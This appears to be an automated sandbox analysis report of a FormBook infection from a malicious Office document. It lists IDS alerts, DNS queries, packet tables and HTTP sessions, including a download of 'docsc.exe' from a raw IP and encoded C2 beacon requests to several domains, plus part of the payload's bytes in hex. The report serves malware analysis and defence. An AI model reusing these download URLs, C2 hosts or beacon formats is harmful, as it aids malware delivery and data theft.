                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              000007110h2embeddedpackage70922AbctfhgXgdghgh.ScTC:\jsdsDggf\AbctfhgXGdghgh.ScTC:\kakepatY\Abctfhghgdghgh.ScTno
                                              10002B241h2embeddedOLE2LInk2560no

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/12/21-11:35:00.035894TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22184.168.131.241
                                              05/12/21-11:35:00.035894TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22184.168.131.241
                                              05/12/21-11:35:00.035894TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22184.168.131.241
                                              05/12/21-11:35:05.872672TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22202.210.8.86
                                              05/12/21-11:35:05.872672TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22202.210.8.86
                                              05/12/21-11:35:05.872672TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22202.210.8.86
                                              05/12/21-11:35:18.930278TCP1201ATTACK-RESPONSES 403 Forbidden804916975.2.115.196192.168.2.22
                                              05/12/21-11:35:24.188290TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22
                                              05/12/21-11:35:29.433298TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22107.155.89.74
                                              05/12/21-11:35:29.433298TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22107.155.89.74
                                              05/12/21-11:35:29.433298TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22107.155.89.74
                                              05/12/21-11:35:40.820714TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2244.230.85.241
                                              05/12/21-11:35:40.820714TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2244.230.85.241
                                              05/12/21-11:35:40.820714TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2244.230.85.241

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2021 11:33:33.363487959 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.501977921 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.502048016 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.502810001 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.640979052 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641055107 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641078949 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641098976 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641119957 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641139984 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641141891 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641169071 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641170025 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641175032 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641176939 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641205072 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641361952 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641403913 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641407967 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641427994 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641448021 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641448975 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.641458988 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.641485929 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.645550966 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779521942 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779596090 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779637098 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779685974 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779700994 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779731989 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779736996 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779745102 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779794931 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779795885 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779844999 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779858112 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779903889 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779905081 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.779952049 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.779962063 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780015945 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780045986 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780077934 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780097961 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780117989 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780129910 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780162096 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780167103 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780214071 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780220985 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780263901 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780265093 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780307055 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780318975 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780349970 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780361891 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780390024 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780394077 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780430079 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.780431032 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.780469894 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.781770945 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.919584036 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.919626951 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.919646025 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.919671059 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.919775963 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921458006 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921487093 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921514034 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921538115 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921546936 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921565056 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921566010 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921580076 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921600103 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921616077 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921641111 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921660900 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921667099 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921674967 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921691895 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921713114 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921731949 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921735048 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921765089 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921775103 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921789885 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921801090 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921825886 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921896935 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921947002 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.921952009 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921977043 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.921996117 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.922005892 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.922008991 CEST4916580192.168.2.22157.55.173.72
                                              May 12, 2021 11:33:33.922033072 CEST8049165157.55.173.72192.168.2.22
                                              May 12, 2021 11:33:33.922044992 CEST4916580192.168.2.22157.55.173.72

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2021 11:34:59.769030094 CEST5219753192.168.2.228.8.8.8
                                              May 12, 2021 11:34:59.830743074 CEST53521978.8.8.8192.168.2.22
                                              May 12, 2021 11:35:05.280203104 CEST5309953192.168.2.228.8.8.8
                                              May 12, 2021 11:35:05.580121994 CEST53530998.8.8.8192.168.2.22
                                              May 12, 2021 11:35:11.193069935 CEST5283853192.168.2.228.8.8.8
                                              May 12, 2021 11:35:11.254053116 CEST53528388.8.8.8192.168.2.22
                                              May 12, 2021 11:35:18.582586050 CEST6120053192.168.2.228.8.8.8
                                              May 12, 2021 11:35:18.730459929 CEST53612008.8.8.8192.168.2.22
                                              May 12, 2021 11:35:23.940232992 CEST4954853192.168.2.228.8.8.8
                                              May 12, 2021 11:35:24.006093979 CEST53495488.8.8.8192.168.2.22
                                              May 12, 2021 11:35:29.197446108 CEST5562753192.168.2.228.8.8.8
                                              May 12, 2021 11:35:29.264175892 CEST53556278.8.8.8192.168.2.22
                                              May 12, 2021 11:35:34.638300896 CEST5600953192.168.2.228.8.8.8
                                              May 12, 2021 11:35:34.702411890 CEST53560098.8.8.8192.168.2.22
                                              May 12, 2021 11:35:40.227356911 CEST6186553192.168.2.228.8.8.8
                                              May 12, 2021 11:35:40.419100046 CEST53618658.8.8.8192.168.2.22
                                              May 12, 2021 11:35:46.028728962 CEST5517153192.168.2.228.8.8.8
                                              May 12, 2021 11:35:46.082037926 CEST53551718.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 12, 2021 11:34:59.769030094 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.boostcoachingonline.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:05.280203104 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.thepocket-onlinelesson.xyzA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:11.193069935 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.qqkit.netA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:18.582586050 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.applewholesales.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:23.940232992 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.southernbrushworks.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:29.197446108 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.betsysellsswfl.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:34.638300896 CEST192.168.2.228.8.8.80x18f7Standard query (0)www.ethereumdailypay.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:40.227356911 CEST192.168.2.228.8.8.80x4b93Standard query (0)www.foreverjsdesigns.comA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:46.028728962 CEST192.168.2.228.8.8.80xc2d7Standard query (0)www.4520oceanviewavenue.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 12, 2021 11:34:59.830743074 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.boostcoachingonline.comboostcoachingonline.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:34:59.830743074 CEST8.8.8.8192.168.2.220xa14dNo error (0)boostcoachingonline.com184.168.131.241A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:05.580121994 CEST8.8.8.8192.168.2.220x2e78No error (0)www.thepocket-onlinelesson.xyz202.210.8.86A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:11.254053116 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.qqkit.netnonenoneA (IP address)IN (0x0001)
                                              May 12, 2021 11:35:18.730459929 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.applewholesales.com75.2.115.196A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:24.006093979 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.southernbrushworks.comsouthernbrushworks.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:35:24.006093979 CEST8.8.8.8192.168.2.220x6ec7No error (0)southernbrushworks.com34.102.136.180A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:29.264175892 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.betsysellsswfl.combetsysellsswfl.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:35:29.264175892 CEST8.8.8.8192.168.2.220xf09aNo error (0)betsysellsswfl.com107.155.89.74A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:34.702411890 CEST8.8.8.8192.168.2.220x18f7No error (0)www.ethereumdailypay.comethereumdailypay.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:35:34.702411890 CEST8.8.8.8192.168.2.220x18f7No error (0)ethereumdailypay.com209.143.158.10A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:40.419100046 CEST8.8.8.8192.168.2.220x4b93No error (0)www.foreverjsdesigns.comuixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:35:40.419100046 CEST8.8.8.8192.168.2.220x4b93No error (0)uixie.porkbun.com44.230.85.241A (IP address)IN (0x0001)
                                              May 12, 2021 11:35:46.082037926 CEST8.8.8.8192.168.2.220xc2d7No error (0)www.4520oceanviewavenue.com4520oceanviewavenue.comCNAME (Canonical name)IN (0x0001)
                                              May 12, 2021 11:35:46.082037926 CEST8.8.8.8192.168.2.220xc2d7No error (0)4520oceanviewavenue.com184.168.131.241A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 157.55.173.72
                                              • www.boostcoachingonline.com
                                              • www.thepocket-onlinelesson.xyz
                                              • www.applewholesales.com
                                              • www.southernbrushworks.com
                                              • www.betsysellsswfl.com
                                              • www.ethereumdailypay.com
                                              • www.foreverjsdesigns.com
                                              • www.4520oceanviewavenue.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165157.55.173.7280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:33:33.502810001 CEST0OUTGET /goose/docsc.exe HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 157.55.173.72
                                              Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1157.55.173.7280192.168.2.2249165C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:33:33.641055107 CEST1INHTTP/1.1 200 OK
                                              Date: Wed, 12 May 2021 09:33:33 GMT
                                              Server: Apache/2.4.18 (Ubuntu)
                                              Last-Modified: Wed, 12 May 2021 07:52:57 GMT
                                              ETag: "edc00-5c21d4c824840"
                                              Accept-Ranges: bytes
                                              Content-Length: 973824
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdos-program
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3c eb aa f7 af
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELT`P @ @@|O@ HU#j;F_`0X Z@.text^ `.rsrc@@@.reloc@B `<


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.2.224917344.230.85.24180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:40.820713997 CEST2052OUTGET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.foreverjsdesigns.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:41.019629955 CEST2052INHTTP/1.1 307 Temporary Redirect
                                              Server: openresty
                                              Date: Wed, 12 May 2021 09:35:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 168
                                              Connection: close
                                              Location: https://foreverjsdesigns.bigcartel.com
                                              X-Frame-Options: sameorigin
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.2.2249174184.168.131.24180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:46.288924932 CEST2053OUTGET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1
                                              Host: www.4520oceanviewavenue.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:46.545229912 CEST2054INHTTP/1.1 200 OK
                                              Server: nginx/1.16.1
                                              Date: Wed, 12 May 2021 09:35:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 32 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 20 20 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 6f 75 72 73 2e 74 6f 75 72 69 6d 61 67 69 6e 67 2e 63 6f 6d 2f 73 2f 69 64 78 2f 35 37 37 30 33 33 3f 79 78 6c 34 41 3d 49 4a 42 38 53 70 74 50 4f 56 26 61 6d 70 3b 62 7a 72 44 3d 4f 33 6f 31 55 2b 71 35 6f 4c 57 77 41 6f 34 63 73 4d 34 6b 7a 5a 46 7a 75 76 47 5a 78 31 38 46 32 4a 74 7a 53 67 6f 47 6f 6c 75 66 59 54 71 78 61 59 34 68 52 74 5a 71 53 38 6c 6b 37 76 62 39 4f 64 38 77 42 67 3d 3d 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 20a<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <title>Tour Imaging Virtual Tours</title> <meta name="description" content="Tour Imaging Virtual Tours"> <meta name="keywords" content="Tour Imaging Virtual Tours"></head><frameset rows="100%,*" border="0"> <frame src="http://tours.tourimaging.com/s/idx/577033?yxl4A=IJB8SptPOV&amp;bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg==" frameborder="0" /></frameset></html>0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249166157.55.173.7280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:33:42.378966093 CEST1027OUTGET /goose/docsc.exe HTTP/1.1
                                              Host: 157.55.173.72
                                              Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3157.55.173.7280192.168.2.2249166C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:33:42.518533945 CEST1029INHTTP/1.1 200 OK
                                              Date: Wed, 12 May 2021 09:33:42 GMT
                                              Server: Apache/2.4.18 (Ubuntu)
                                              Last-Modified: Wed, 12 May 2021 07:52:57 GMT
                                              ETag: "edc00-5c21d4c824840"
                                              Accept-Ranges: bytes
                                              Content-Length: 973824
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdos-program
